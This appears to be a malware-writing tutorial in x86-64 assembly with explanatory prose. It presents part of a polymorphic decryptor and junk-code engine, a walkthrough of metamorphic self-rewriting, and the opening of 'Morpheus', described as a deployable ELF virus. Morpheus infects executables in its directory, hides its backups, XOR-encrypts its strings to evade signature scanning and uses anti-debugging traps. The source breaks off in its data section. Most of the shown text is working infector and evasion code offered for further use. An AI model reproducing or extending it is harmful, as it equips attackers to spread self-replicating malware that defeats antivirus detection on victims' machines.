stosb
; syscall
mov al, 0x0F
stosb
mov al, 0x05
stosb
ret
; generate decryption stub
stub_decrypt:
; mov rbx,rax (save mmap result)
mov al, 0x48
stosb
mov al, 0x89
stosb
mov al, 0xC3
stosb
; calculate RIP-relative offset to embedded engine
mov r15, rdi
mov rax, [rel p_entry]
mov rdx, [rel stub_sz]
test rdx, rdx
jnz .usszz
; fallback calculation
mov rdx, rdi
sub rdx, [rel p_entry]
add rdx, 100
.usszz:
add rax, rdx ; engine position
; RIP-relative calculation
mov rbx, r15
add rbx, 7 ; after LEA instruction
sub rax, rbx
; lea rsi,[rip+offset]
mov r13, rax ; save offset: the mov al stores below clobber rax
mov al, 0x48
stosb
mov al, 0x8D
stosb
mov al, 0x35
stosb
mov eax, r13d ; emit saved offset as disp32
stosd
; mov rcx,engine_size
mov al, 0x48
stosb
mov al, 0xC7
stosb
mov al, 0xC1
stosb
mov rax, [rel engine_size]
test rax, rax
jnz .engine_sz
mov rax, 512
.engine_sz:
cmp rax, 65536
jbe .size_ok
mov rax, 65536
.size_ok:
stosd
; mov rdx,stub_key
mov al, 0x48
stosb
mov al, 0xBA
stosb
mov rax, [rel stub_key]
stosq
; decryption loop
mov r14, rdi
; test rcx,rcx
mov al, 0x48
stosb
mov al, 0x85
stosb
mov al, 0xC9
stosb
; jz done
mov al, 0x74
stosb
mov al, 0x0E ; skip 14-byte loop body (2+4+3+3+2)
stosb
; xor [rsi],dl
mov al, 0x30
stosb
mov al, 0x16
stosb
; rol rdx,7
mov al, 0x48
stosb
mov al, 0xC1
stosb
mov al, 0xC2
stosb
mov al, 7
stosb
; inc rsi
mov al, 0x48
stosb
mov al, 0xFF
stosb
mov al, 0xC6
stosb
; dec rcx
mov al, 0x48
stosb
mov al, 0xFF
stosb
mov al, 0xC9
stosb
; jmp loop
mov al, 0xEB
stosb
mov rax, r14
sub rax, rdi
sub rax, 1 ; rel8 = r14 - (rdi + 1), already negative for the back jump
stosb
; copy to allocated memory
; mov rdi,rbx
mov al, 0x48
stosb
mov al, 0x89
stosb
mov al, 0xDF
stosb
; calculate engine position
mov rax, [rel p_entry]
mov rbx, [rel stub_sz]
add rax, rbx
; RIP-relative offset
mov rbx, rdi
add rbx, 7
sub rax, rbx
; lea rsi,[rip+offset]
mov r13, rax ; save offset before opcode emission clobbers rax
mov al, 0x48
stosb
mov al, 0x8D
stosb
mov al, 0x35
stosb
mov eax, r13d ; emit saved offset as disp32
stosd
; mov rcx,engine_size
mov al, 0x48
stosb
mov al, 0xC7
stosb
mov al, 0xC1
stosb
mov rax, [rel engine_size]
test rax, rax
jnz .engine_sz2
mov rax, 256
.engine_sz2:
stosd
; rep movsb
mov al, 0xF3
stosb
mov al, 0xA4
stosb
mov al, RET_OPCODE
stosb
ret
bf_boo:
push rbx
mov rax, rdi
sub rax, [rel p_entry]
add rax, 300
cmp rax, [rel sz]
pop rbx
ret
; generate runtime keys
gen_runtm:
push rbx
push rcx
rdtsc ; entropy from RDTSC
shl rdx, 32
or rax, rdx
xor rax, [rel key] ; mix with user key
mov rbx, rsp ; stack entropy
xor rax, rbx
call .get_rip ; RIP entropy
.get_rip:
pop rbx
xor rax, rbx
rol rax, 13
mov rbx, rax ; dynamic constant
ror rbx, 19
xor rbx, rsp
add rax, rbx
mov rbx, rax ; dynamic XOR
rol rbx, 7
not rbx
xor rax, rbx
mov [rel stub_key], rax
rol rax, 7 ; secondary key
mov rbx, 0xCAFE0F00
shl rbx, 32
or rbx, 0xDEADC0DE
xor rax, rbx
mov [rel sec_key], rax
mov rax, [rel stub_key] ; ensure different from user key
cmp rax, [rel key]
jne .keys_different
not rax
mov [rel stub_key], rax
.keys_different:
pop rcx
pop rbx
ret
; PRNG
next_random:
push rdx
mov rax, [rel seed]
mov rdx, rax
shl rdx, 13
xor rax, rdx
mov rdx, rax
shr rdx, 17
xor rax, rdx
mov rdx, rax
shl rdx, 5
xor rax, rdx
mov [rel seed], rax
pop rdx
ret
random_range: ; range passed in rdx; returns rax in [0, rdx)
push rdx
call next_random
pop rcx ; retrieve the saved range into rcx
test rcx, rcx
jz .range_zero
xor rdx, rdx
div rcx
mov rax, rdx
ret
.range_zero:
xor rax, rax
ret
; random boolean
yes_no:
call next_random
and rax, 0xF
cmp rax, 7
setbe al
movzx rax, al
ret
; select random registers
get_rr:
call next_random
and rax, 7
cmp al, REG_RSP
je get_rr
cmp al, REG_RAX ; avoid rax as base
je get_rr
mov [rel reg_base], al
.retry_count:
call next_random
and rax, 7
cmp al, REG_RSP
je .retry_count
cmp al, REG_RAX ; avoid rax as count
je .retry_count
cmp al, [rel reg_base]
je .retry_count
mov [rel reg_count], al
.retry_key:
call next_random
and rax, 7
cmp al, REG_RSP
je .retry_key
cmp al, [rel reg_base]
je .retry_key
cmp al, [rel reg_count]
je .retry_key
mov [rel reg_key], al
.retry_junk1:
call next_random
and rax, 15
cmp al, REG_RSP
je .retry_junk1
mov [rel junk_reg1], al
.retry_junk2:
call next_random
and rax, 15
cmp al, REG_RSP
je .retry_junk2
cmp al, [rel junk_reg1]
je .retry_junk2
mov [rel junk_reg2], al
.retry_junk3:
call next_random
and rax, 15
cmp al, REG_RSP
je .retry_junk3
cmp al, [rel junk_reg1]
je .retry_junk3
cmp al, [rel junk_reg2]
je .retry_junk3
mov [rel junk_reg3], al
ret
; select algorithm
set_al:
call next_random
and rax, 3
mov [rel alg0_dcr], al
ret
; generate prologue
gen_p:
call gen_jmp
call trash
call yes_no
test rax, rax
jz .skip_trash1
call trash
.skip_trash1:
; mov reg_key,key
call gen_jmp
mov al, 0x48
stosb
mov al, 0xB8
add al, [rel reg_key]
stosb
mov byte [rel prolog_set], 1
mov rax, [rel key]
stosq
call yes_no
test rax, rax
jz .skip_trash2
call trash
.skip_trash2:
ret
; generate decrypt loop
gen_dec:
mov [rel jmp_back], rdi
call trash
call gen_jmp
; mov reg_base,rdi (data pointer)
mov al, 0x48
stosb
mov al, 0x89
stosb
mov al, 0xF8
add al, [rel reg_base]
stosb
call trash
call gen_jmp
; mov reg_count,rsi (size)
mov al, 0x48
stosb
mov al, 0x89
stosb
mov al, 0xF0
add al, [rel reg_count]
stosb
call trash
call gen_jmp
.decr_loop:
movzx rax, byte [rel alg0_dcr]
cmp al, 0
je .gen_algo_0
cmp al, 1
je .gen_algo_1
cmp al, 2
je .gen_algo_2
jmp .gen_algo_3
.gen_algo_0:
; add/rol/xor
call gen_add_mem_key
call trash
call gen_trash
call gen_rol_mem_16
call trash
call gen_trash
call gen_xor_mem_key
jmp .gen_loop_end
.gen_algo_1:
; xor/rol/xor
call gen_xor_mem_key
call trash
call gen_trash
call gen_rol_mem_16
call trash
call gen_trash
call gen_xor_mem_key
jmp .gen_loop_end
.gen_algo_2:
; sub/ror/xor
call gen_sub_mem_key
call trash
call gen_trash
call gen_ror_mem_16
call trash
call gen_trash
call gen_xor_mem_key
jmp .gen_loop_end
.gen_algo_3:
; xor/add/xor
call gen_xor_mem_key
call trash
call gen_trash
call gen_add_mem_key
call trash
call gen_trash
call gen_xor_mem_key
.gen_loop_end:
call trash
call gen_jmp
mov al, ADD_REG_IMM8
stosb
mov al, 0xC0
add al, [rel reg_base]
stosb
mov al, 8
stosb
call trash
call gen_jmp
; generate DEC instruction
movzx rax, byte [rel reg_count]
cmp al, 8
jb .dec_no_rex
mov al, 0x49 ; rex.wb for r8-r15
stosb
movzx rax, byte [rel reg_count]
sub al, 8
jmp .dec_encode
.dec_no_rex:
mov al, 0x48 ; rex.w for rax-rdi
stosb
movzx rax, byte [rel reg_count]
.dec_encode:
mov dl, al              ; register index, already reduced to 0-7
mov al, 0xFF            ; DEC r/m64 opcode
stosb
mov al, 0xC8            ; ModR/M: /1 extension, register-direct
add al, dl
stosb
mov al, TEST_REG_REG
stosb
mov al, [rel reg_count]
shl al, 3
add al, [rel reg_count]
add al, 0xC0
stosb
mov ax, JNZ_LONG
stosw
mov rax, [rel jmp_back]
sub rax, rdi
sub rax, 4              ; rel32 = loop_start - (rip after the jnz): negative
stosd
ret
; algorithm generators
gen_add_mem_key:
call gen_jmp
mov al, ADD_MEM_REG
stosb
mov dl, [rel reg_key]
shl dl, 3
mov al, [rel reg_base]
add al, dl
stosb
ret
gen_sub_mem_key:
call gen_jmp
mov al, 0x48
stosb
mov al, 0x29
stosb
mov dl, [rel reg_key]
shl dl, 3
mov al, [rel reg_base]
add al, dl
stosb
ret
gen_xor_mem_key:
call gen_jmp
mov ax, XOR_MEM_REG
mov dl, [rel reg_key]
shl dl, 3
mov ah, [rel reg_base]
add ah, dl
stosw
ret
gen_rol_mem_16:
call gen_jmp
mov al, 0x48
stosb
mov ax, ROL_MEM_IMM
add ah, [rel reg_base]
stosw
mov al, 16
stosb
ret
gen_ror_mem_16:
call gen_jmp
mov al, 0x48
stosb
mov al, 0xC1
stosb
mov al, 0x08
add al, [rel reg_base]
stosb
mov al, 16
stosb
ret
; basic junk
trash:
call yes_no
test rax, rax
jz .skip_push_pop
movzx rax, byte [rel junk_reg1] ; push/pop junk
cmp al, 8
jb .push_no_rex
mov al, 0x41
stosb
movzx rax, byte [rel junk_reg1]
sub al, 8
.push_no_rex:
add al, PUSH_REG
stosb
movzx rax, byte [rel junk_reg2]
cmp al, 8
jb .pop_no_rex
mov al, 0x41
stosb
movzx rax, byte [rel junk_reg2]
sub al, 8
.pop_no_rex:
add al, POP_REG
stosb
.skip_push_pop:
call gen_jmp
ret
; jumps
gen_jmp:
call yes_no
test rax, rax
jz .short_jmp
mov al, JMP_REL32
stosb
mov eax, 1
stosd
call next_random
and al, 0xFF
stosb
jmp .jmp_exit
.short_jmp:
mov al, JMP_SHORT
stosb
mov al, 1
stosb
call next_random
and al, 0xFF
stosb
.jmp_exit:
ret
; self-modifying junk
gen_self:
mov al, CALL_REL32
stosb
mov eax, 3
stosd
mov al, JMP_REL32
stosb
mov ax, 0x04EB
stosw
call next_random
and rax, 2
lea rdx, [rel junk_reg1]
movzx rdx, byte [rdx + rax]
mov al, POP_REG
add al, dl
stosb
mov al, 0x48
stosb
mov al, 0xFF
stosb
mov al, 0xC0
add al, dl
stosb
mov al, PUSH_REG
add al, dl
stosb
mov al, RET_OPCODE
stosb
ret
; advanced junk procedures
gen_trash:
call yes_no
test rax, rax
jz .try_proc2
mov al, CALL_REL32
stosb
mov eax, 2
stosd
mov ax, 0x08EB          ; jmp over the 8-byte inline routine, incl. its ret
stosw
mov al, 0x55
stosb
mov al, 0x48
stosb
mov al, 0x89
stosb
mov al, 0xE5
stosb
mov ax, FNINIT_OPCODE
stosw
mov al, 0x5D
stosb
mov al, RET_OPCODE
stosb
jmp .exit_trash
.try_proc2:
call yes_no
test rax, rax
jz .try_proc3
mov al, CALL_REL32
stosb
mov eax, 2
stosd
mov ax, 0x0AEB
stosw
mov ax, 0x5350          ; push rax; push rbx (pusha/popa are invalid in 64-bit mode)
stosw
mov eax, 0xC38BC333     ; xor eax,ebx; mov eax,ebx
stosd
mov al, 0x93            ; xchg eax,ebx
stosb
mov ax, 0x585B          ; pop rbx; pop rax (state fully restored)
stosw
mov al, RET_OPCODE
stosb
jmp .exit_trash
.try_proc3:
call yes_no
test rax, rax
jz .exit_trash
mov al, CALL_REL32
stosb
mov eax, 2
stosd
mov eax, 0x525010EB
stosd
mov ax, 0xC069
stosw
mov eax, 0x90
stosd
mov al, 0x2D
stosb
mov eax, 0xDEADC0DE
stosd
mov ax, 0x585A
stosw
mov al, RET_OPCODE
stosb
.exit_trash:
ret
; dummy procedures
gen_dummy:
call yes_no
test rax, rax
jz .skip_dummy
mov al, CALL_REL32
stosb
mov eax, 15
stosd
mov al, 0x48
stosb
mov al, TEST_REG_REG
stosb
mov al, 0xC0
stosb
mov al, JZ_SHORT
stosb
mov al, 8
stosb
mov al, 0x55
stosb
mov al, 0x48
stosb
mov al, 0x89
stosb
mov al, 0xE5
stosb
mov ax, FNINIT_OPCODE
stosw
mov ax, FNOP_OPCODE
stosw
call next_random
and rax, 0xFF
mov al, 0x48
stosb
mov al, 0xB8
stosb
stosq
mov al, 0x5D
stosb
mov al, RET_OPCODE
stosb
.skip_dummy:
ret
; execute generated stub
exec_c:
push rbp
mov rbp, rsp
sub rsp, 32
push rbx
push r12
push r13
push r14
push r15
mov r12, rdi ; stub code
mov r13, rsi ; stub size
mov r14, rdx ; payload data
; validate input
test r12, r12
jz .error
test r13, r13
jz .error
cmp r13, 1
jb .error
cmp r13, 65536
ja .error
mov rax, 9 ; mmap
mov rdi, 0
mov rsi, r13
add rsi, 4096 ; padding
mov rdx, 0x7 ; rwx
mov r10, 0x22 ; private|anon
mov r8, -1
mov r9, 0
syscall
cmp rax, -4096          ; raw syscall returns -errno on failure
ja .error
test rax, rax
jz .error
mov rbx, rax
; copy stub to executable memory
mov rdi, rbx
mov rsi, r12
mov rcx, r13
rep movsb
; execute stub
cmp rbx, 0x1000
jb .error
call rbx
; cleanup
mov rax, 11 ; munmap
mov rdi, rbx
mov rsi, r13
add rsi, 4096
syscall
mov rax, 1 ; success
jmp .done
.error:
xor rax, rax
.done:
pop r15
pop r14
pop r13
pop r12
pop rbx
add rsp, 32
pop rbp
ret
Current Limitations
At present, it is strictly limited to Linux x64 because of direct syscall dependencies: the mmap usage is customized for Linux, and register conventions are bound to x64. Porting to Windows would require adapting calling conventions and likely rewriting large parts of the engine logic. macOS has its own syscall numbers and memory protection details, so it would not run with simple changes.
The algorithm set is deliberately limited to four variants. This scale is sufficient to prove the concept without making the system overly complex or fragile. Expanding to dozens of equivalent variants is feasible but significantly increases the risk of introducing bugs and requires careful balancing of complexity and correctness.
There is currently no runtime recompilation mechanism: each variant is generated once and remains static during execution. Self-modifying variants could further improve evasion but introduce instability and substantially raise implementation cost.
Future directions could include:
- Adding a syscall abstraction layer for true cross-platform support (Linux, Windows, macOS).
- Expanding the algorithm set and improving encryption/obfuscation (currently quite crude in this area).
- Building a dynamic rewriting engine that supports self-modifying payloads.
Even in its current form, it has already achieved the core goals: functional correctness, deep signature diversity, entropy-driven key generation, intelligent junk injection, and multi-layered polymorphic structure. Implementation details can vary, but these foundational principles remain stable.
This is a foundational polymorphic engine, intentionally designed to be “usable and clear.” You can use it first to understand the core techniques, then build upon it. Once you internalize these layers of entropy, obfuscation, and instruction encoding, you can take it in any direction you choose.
What Truly Makes Code Mutable
Metamorphic code is more than obfuscation — it rewrites itself. On every execution, it parses its own binary, locates mutable regions, and replaces them with semantically equivalent but syntactically different instruction sequences.
For a simple task like clearing a register, you can use XOR RAX, RAX, SUB RAX, RAX, MOV RAX, 0, or even PUSH 0; POP RAX. Same effect, different opcodes. To a static scanner, these are often unrelated.
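As a quick illustration (Python used only to hold the byte patterns; the encodings themselves are standard x86-64), those zeroing idioms assemble to entirely different byte sequences:

```python
# Semantically equivalent ways to zero RAX, with their standard x86-64
# encodings. A signature keyed on any one byte pattern misses the others.
ZERO_RAX = {
    "xor rax, rax":    bytes([0x48, 0x31, 0xC0]),
    "sub rax, rax":    bytes([0x48, 0x29, 0xC0]),
    "mov rax, 0":      bytes([0x48, 0xC7, 0xC0, 0x00, 0x00, 0x00, 0x00]),
    "push 0; pop rax": bytes([0x6A, 0x00, 0x58]),
}

# All four encodings are pairwise distinct, and even the lengths differ.
assert len(set(ZERO_RAX.values())) == 4
```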
A metamorphic engine exploits this by maintaining an instruction-level replacement catalog. Each iteration applies randomized transformations: register renaming, safe reordering of instructions, junk code insertion, and control-flow reconstruction. Logic remains unchanged, but layout continuously evolves.
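A minimal model of such a catalog (a Python sketch with made-up mnemonics, not any engine's actual table) might look like this:

```python
import random

# Hypothetical substitution catalog: one abstract operation, several
# interchangeable concrete spellings. A pass rewrites each site at random.
CATALOG = {
    "zero": ["xor {r}, {r}", "sub {r}, {r}", "mov {r}, 0"],
    "inc":  ["inc {r}", "add {r}, 1", "sub {r}, -1"],
}

def mutate(ops, rng):
    """ops: list of (operation, register). Returns one random concrete form per op."""
    return [rng.choice(CATALOG[op]).format(r=reg) for op, reg in ops]

prog = [("zero", "rax"), ("inc", "rcx"), ("zero", "rdx")]
variant = mutate(prog, random.Random())
# Every emitted line is drawn from the catalog, so semantics are preserved
# by construction while the concrete text varies run to run.
```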
Combined with replication propagation, each infected binary carries mutations from its “parent” and adds new mutations during infection. Over time, this creates a family of functionally equivalent but structurally distinct samples. No fixed signatures, no stable patterns — only continuous evolution at the opcode level. This is why it is often called “assembly heaven.”
Classic Reference: MetaPHOR
In 2002, there was a very solid article dissecting metamorphic engine structure: The Mental Driller’s “How I Made MetaPHOR and What I’ve Learned.” Yes, 2002 — ancient by today’s standards, but the core principles remain strikingly relevant. Some adaptation is needed for modern systems, but the underlying mechanisms are still solid.
Polymorphism focuses on camouflage: adjusting the decryptor, wrapping the payload, keeping the core static. Metamorphism discards the shell and directly modifies the interior. It disassembles complete code blocks, rewrites them from scratch, and reassembles the binary — producing new logical layouts, altered control flow, and shifted instruction patterns. Every landing looks different.
It is not just renaming registers or sprinkling NOPs. It is full-code-level mutation — deep structural churning that leaves no stable anchor points for static fingerprints.
— Disassembly and Shrinking —
To mutate, a virus (VX) must first disassemble itself into an internal pseudo-assembly format — a custom abstraction layer that makes original opcodes readable and transformable. It breaks apart its instruction stream, decodes jumps, calls, and conditional branches, then maps control flow into manageable data structures.
After disassembly, the code is written into a memory buffer. Pointer tables are built for jump targets, call destinations, and other critical control elements to ensure relationships are not broken during rewriting.
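A toy version of such a pointer table (Python, with invented instruction tuples) can be as simple as mapping label names to instruction indices, so branches survive any later reordering:

```python
# Branches reference labels rather than byte offsets; the table is rebuilt
# after every transformation, so control flow survives moves and resizes.
def build_jump_table(instrs):
    """instrs: list of (mnemonic, operand) tuples; returns {label: index}."""
    targets = {op for m, op in instrs if m in ("jmp", "jz", "call")}
    return {op: i for i, (m, op) in enumerate(instrs)
            if m == "label" and op in targets}

code = [
    ("label", "top"),
    ("dec",   "rcx"),
    ("jz",    "done"),
    ("jmp",   "top"),
    ("label", "done"),
    ("ret",   None),
]
assert build_jump_table(code) == {"top": 0, "done": 4}
```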
Next comes the shrinker. This stage scans for bloated instruction sequences and compresses them into minimal equivalent forms.
| Original Instruction | Compressed Instruction | Description |
|---|---|---|
| MOV reg, reg | NOP | Self-move, a dead operation with no effect |
| MOV reg, 0 | XOR reg, reg | Shorter encoding that clears the register |
The shrinker’s job is to trim fat: fold redundant chains, clean up leftovers, and free space for the next round of mutation.
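A shrinker of this kind reduces to a peephole rewrite table. The sketch below (Python, toy textual IR) folds two typical rules: a self-move becomes a NOP and is swept away, and MOV reg, 0 folds into the shorter XOR form:

```python
# Peephole shrinker: fold redundant or oversized forms into minimal ones,
# then sweep away the NOPs left behind by the folds.
RULES = {
    ("mov", "rax", "rax"): [("nop",)],               # self-move is dead
    ("mov", "rax", "0"):   [("xor", "rax", "rax")],  # shorter zeroing idiom
}

def shrink(code):
    out = []
    for ins in code:
        out.extend(RULES.get(ins, [ins]))
    return [i for i in out if i != ("nop",)]

before = [("mov", "rax", "rax"), ("mov", "rax", "0"), ("ret",)]
assert shrink(before) == [("xor", "rax", "rax"), ("ret",)]
```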
— Permutation and Expansion —
After shrinking comes the permutator. Its task is shuffling: reordering instructions and injecting entropy while keeping logic intact, making layout unpredictable.
It also replaces equivalent instructions: same result, different operation.
Following permutation is the expander — the opposite of the shrinker. It expands single instructions into equivalent two- or three-instruction sequences. Recursive expansion continuously increases code complexity.
Control variables impose hard limits to prevent unbounded growth.
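Sketched in Python (toy instruction tuples and an illustrative expansion table), the expander with its depth cap looks like:

```python
import random

# Expander: probabilistically replace an instruction with an equivalent
# sequence, recursing with a hard depth cap so growth stays bounded.
EXPANSIONS = {
    ("xor", "rax", "rax"): [("push", "0"), ("pop", "rax")],
    ("add", "rax", "2"):   [("add", "rax", "1"), ("add", "rax", "1")],
}

def expand(code, rng, depth=2):
    if depth == 0:
        return list(code)
    out = []
    for ins in code:
        if ins in EXPANSIONS and rng.random() < 0.5:
            out.extend(expand(EXPANSIONS[ins], rng, depth - 1))
        else:
            out.append(ins)
    return out

grown = expand([("xor", "rax", "rax"), ("add", "rax", "2"), ("ret",)],
               random.Random(), depth=3)
assert grown[-1] == ("ret",)      # endpoints and semantics preserved
assert len(grown) <= 7            # the depth cap bounds total growth
```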
Finally, the assembler finishes the job: it reassembles the mutated code back into valid machine code.
Only after completing this loop does the VX become a structurally unique but functionally complete new variant. Payload unchanged, appearance brand new.
— Generational Mutation —
You have seen how we do this in polymorphism: injecting junk code and replacing registers. Metamorphic thinking is similar but goes much deeper.
When the VX completes its self-rewrite in memory, it writes the new variant back to disk. Every execution produces a “new copy” containing random junk code and rewritten logic.
[figure: vx-junk-disasm — disassembly listing showing the randomly scattered JUNK macro calls]
Notice those JUNK macro calls? They are randomly scattered. Each is a marker — a hook point that can be safely modified. Smart Trash: deliberately useless, designed specifically to interfere with disassemblers and scanners.
We use a dedicated scanning function to handle them. It traverses the code, looks for PUSH/POP patterns on the same registers (spaced 8 bytes apart), and marks the hit locations. Once marked, these junk segments are overwritten with new, harmless, randomized replacement sequences.
This loop is the core. It hunts for JUNK sequences and replaces them with new random instruction chains on every run. Each JUNK call marks a modifiable slot — essentially a sandboxed code region for generational mutation. Behavior harmless, structure chaotic.
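Modeled in Python (mirroring the checks the engine's validate routine performs, not the exact engine code), the slot test comes down to a handful of byte comparisons:

```python
# Opcode bases for the pattern: PUSH r1 / PUSH r2 / REX.W XCHG x2 / POP r2 / POP r1
PUSH, POP, REX_W, XCHG = 0x50, 0x58, 0x48, 0x87

def is_junk_slot(buf, i):
    """True if buf[i:i+10] matches the 10-byte junk pattern with r1 != r2."""
    if i + 10 > len(buf):
        return False
    r1, r2 = buf[i] - PUSH, buf[i + 1] - PUSH
    if not (0 <= r1 <= 3 and 0 <= r2 <= 3) or r1 == r2:
        return False
    if buf[i + 2] != REX_W or buf[i + 3] != XCHG:
        return False
    # POPs must undo the PUSHes in reverse order
    return buf[i + 8] == POP + r2 and buf[i + 9] == POP + r1

# The JUNK macro's bytes form a valid slot; arbitrary bytes do not.
junk = bytes([0x50, 0x53, 0x48, 0x87, 0xC3, 0x48, 0x87, 0xC3, 0x5B, 0x58])
assert is_junk_slot(junk, 0)
assert not is_junk_slot(bytes(10), 0)
```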
After mutation completes, the VX propagates by copying the new variant into executable files discovered in the same directory. The copy has changed structure but unchanged behavior. True polymorphic/metamorphic malware is not about “fooling AV once,” but about continuous mutation — reshaping the binary with every “breath.” As long as logic remains intact and structure keeps changing, static detection struggles to gain a foothold.
This is only the minimal viable set, covering the key mechanisms. It demonstrates the core path that allows VX code to mutate and survive. There is much more to deeper content, but this is the foundation.
Morpheus
Now it is time for the code I mentioned alongside Veil64 to make its appearance.
Morpheus applies metamorphic principles to a real, runnable virus infector. This is not a theoretical demonstration — it is practical and deployable. It shows how a mutation engine can work end-to-end without relying on encryptors or packers.
The core idea is simple: Morpheus treats its own executable code the way a crypter treats a payload. It loads itself into memory, scans for known patterns, applies transformations, then writes out a mutated version that accomplishes the same tasks with different instruction sequences.
On every run, Morpheus roughly does the following:
- Extracts obfuscated strings and executes its logic
- Loads its own `.text` section
- Disassembles code blocks
- Identifies mutation points (NOPs, junk patterns, simple MOV/XOR operations, etc.)
- Applies transformations (register shuffling, instruction replacement, code block reordering or expansion)
- Generates structurally different but logically consistent code
- Writes the mutated binary to a new target (usually another ELF in the same directory)
- Patches headers as needed to keep it executable
Every generation is truly different — not just added junk and register swaps, but substantive structural change — while the payload and functionality remain fully intact. This allows Morpheus to self-replicate on every execution, rendering static signature detection unreliable. Combined with runtime transformation and actual rewriting of files on disk, traditional scanning methods struggle to track it consistently.
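The scan-and-rewrite core of that pipeline can be sketched in a few lines of Python (the slot finder and rewrite pool here are toy stand-ins; in the real engine the slots are the 10-byte JUNK sequences):

```python
import random

def one_generation(image, find_slots, rewrite, rng):
    """Rewrite every mutable slot in a code image; everything else is untouched."""
    out = bytearray(image)
    for off, length in find_slots(image):
        out[off:off + length] = rewrite(length, rng)
    return bytes(out)

# Toy stand-ins: treat each 0x90 NOP as a 1-byte slot and refill it from a
# small pool (illustration only; CLC/CLD touch flags, so this pool is not
# behavior-neutral in general).
find_slots = lambda img: [(i, 1) for i, b in enumerate(img) if b == 0x90]
pool = [bytes([0x90]), bytes([0xF8]), bytes([0xFC])]  # nop / clc / cld
rewrite = lambda n, rng: rng.choice(pool)

img = bytes([0xB8, 0x01, 0x00, 0x00, 0x00, 0x90, 0x90, 0xC3])  # mov eax,1; nop; nop; ret
gen2 = one_generation(img, find_slots, rewrite, random.Random())
assert len(gen2) == len(img)
assert gen2[:5] == img[:5] and gen2[-1] == 0xC3  # real instructions untouched
```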
Junk code is always a balancing act. In Veil64 we used relatively basic junk padding. Here is a 10-byte sequence that has zero net effect but can easily be mistaken for compiler-generated register preservation code:
PUSH RAX
PUSH RBX
XCHG RAX, RBX
XCHG RAX, RBX
POP RBX
POP RAX
Morpheus makes heavy use of such sequences. The JUNK macro marks these blocks, and on every execution the engine scans and replaces them with structurally different but functionally equivalent junk patterns.
We implemented four register combinations for smart junk patterns. Each variant follows the same logic but uses different register pairs, producing unique byte sequences. These variants are functionally identical with zero side effects, yet their binary signatures change completely.
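Reconstructing those four variants as data (byte values taken from the generator's tables) makes the property easy to check: same shape, distinct ModR/M and push/pop opcodes, hence four unique 10-byte signatures:

```python
# The four spawn_junk register pairings: PUSH a / PUSH b / xchg a,b twice /
# POP b / POP a. Only the register-dependent bytes differ between variants.
JUNK_VARIANTS = {
    "rax/rbx": bytes([0x50, 0x53, 0x48, 0x87, 0xC3, 0x48, 0x87, 0xC3, 0x5B, 0x58]),
    "rcx/rdx": bytes([0x51, 0x52, 0x48, 0x87, 0xCA, 0x48, 0x87, 0xCA, 0x5A, 0x59]),
    "rax/rcx": bytes([0x50, 0x51, 0x48, 0x87, 0xC1, 0x48, 0x87, 0xC1, 0x59, 0x58]),
    "rbx/rdx": bytes([0x53, 0x52, 0x48, 0x87, 0xD3, 0x48, 0x87, 0xD3, 0x5A, 0x5B]),
}
assert all(len(v) == 10 for v in JUNK_VARIANTS.values())
assert len(set(JUNK_VARIANTS.values())) == 4
# Every variant pops in reverse order of its pushes (POP opcode = PUSH + 8).
for v in JUNK_VARIANTS.values():
    assert v[8] == v[1] + 8 and v[9] == v[0] + 8
```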
String Encryption
All strings are encrypted to evade static signature detection. I used a simple XOR scheme: each string gets its own key, and decryption is a single XOR pass. Why XOR? Because it is fast.
Decryption runs once at startup. To add extra resistance, I included INT3 trap shellcode to disrupt debugger flow.
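Since XOR is its own inverse, the scheme round-trips trivially. A quick Python check against the bytes from the data section (the key table, and the `.morph8` string as stored):

```python
# Per-string single-byte XOR: pick a key by index, XOR every byte once.
# The same pass both encrypts and decrypts.
XOR_KEYS = bytes([0xAA, 0x55, 0xCC, 0x33, 0xFF, 0x88, 0x77])

def xor_pass(data, key_index):
    k = XOR_KEYS[key_index]
    return bytes(b ^ k for b in data)

# ".morph8" as stored in the binary, encrypted under key index 6 (0x77):
hidd = bytes([0x59, 0x1A, 0x18, 0x05, 0x07, 0x1F, 0x4F, 0x77])
assert xor_pass(hidd, 6) == b".morph8\x00"
# Round trip: applying the same pass twice restores the plaintext.
assert xor_pass(xor_pass(b"chmod +x %s\x00", 1), 1) == b"chmod +x %s\x00"
```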
— Infection —
During the infection stage, we scan the directory for ELF binaries. The scanner performs several basic checks to filter out garbage files and retain only viable ELF executable targets (regular files, no hidden files, valid ELF magic, executable and writable permissions).
Before any overwrite, it creates a hidden backup prefixed with .morph8. If the backup already exists, infection is skipped — acting as an “already morphed” marker.
— Morpheus Engine —
;;
;; M O R P H E U S [ polymorphic ELF infector ]
;; ------------------------------------------------
;; stealth // mutation // syscall-only // junked //
;; ------------------------------------------------
;; 0xBADC0DE // .morph8 // Linux x86_64 // 0xf00sec
;;
%define PUSH 0x50
%define POP 0x58
%define MOV 0xB8
%define NOP 0x90
%define REX_W 0x48
%define XCHG_OP 0x87
%define XCHG_BASE 0xC0
%define ADD_OP 0x01
%define AND_OP 0x21
%define XOR_OP 0x31
%define OR_OP 0x09
%define SBB_OP 0x19
%define SUB_OP 0x29
%define JUNKLEN 10
; push rax,rbx; xchg rax,rbx; xchg rax,rbx; pop rbx,rax
%macro JUNK 0
db 0x50, 0x53, 0x48, 0x87, 0xC3, 0x48, 0x87, 0xC3, 0x5B, 0x58
%endmacro
section .data
; ELF header
ELF_MAGIC dd 0x464C457F
ELF_CLASS64 equ 2
ELF_DATA2LSB equ 1
ELF_VERSION equ 1
ELF_OSABI_SYSV equ 0
ET_EXEC equ 2
ET_DYN equ 3
EM_X86_64 equ 62
prefixes db ADD_OP, AND_OP, XOR_OP, OR_OP, SBB_OP, SUB_OP, 0
bin_name times 256 db 0
orig_exec_name times 256 db 0
msg_cat db " /\_/\ ",10
db "( o.o )",10
db " > ^ <",10,0 ; payload
current_dir db "./",0
; encrypted strings
cmhd db 0x36, 0x3D, 0x38, 0x3A, 0x31, 0x75, 0x7E, 0x2D, 0x75, 0x70, 0x26, 0x55 ; "chmod +x %s"
tchh db 0xAF, 0xA4, 0xA1, 0xA3, 0xA8, 0xEC, 0xE7, 0xB4, 0xEC, 0xE9, 0xBF, 0xCC ; "chmod +x %s"
touc db 0xDE, 0xC5, 0xDF, 0xC9, 0xC2, 0x8A, 0x8F, 0xD9, 0xAA ; "touch %s"
cpcm db 0x9C, 0x8F, 0xDF, 0xDA, 0x8C, 0xDF, 0xDA, 0x8C, 0xFF ; "cp %s %s"
hidd db 0x59, 0x1A, 0x18, 0x05, 0x07, 0x1F, 0x4F, 0x77 ; ".morph8"
exec db 0x1D, 0x1C, 0x16, 0x40, 0x33 ; "./%s"
vxxe db 0xFE, 0xF0, 0xF0, 0x88 ; "vxx"
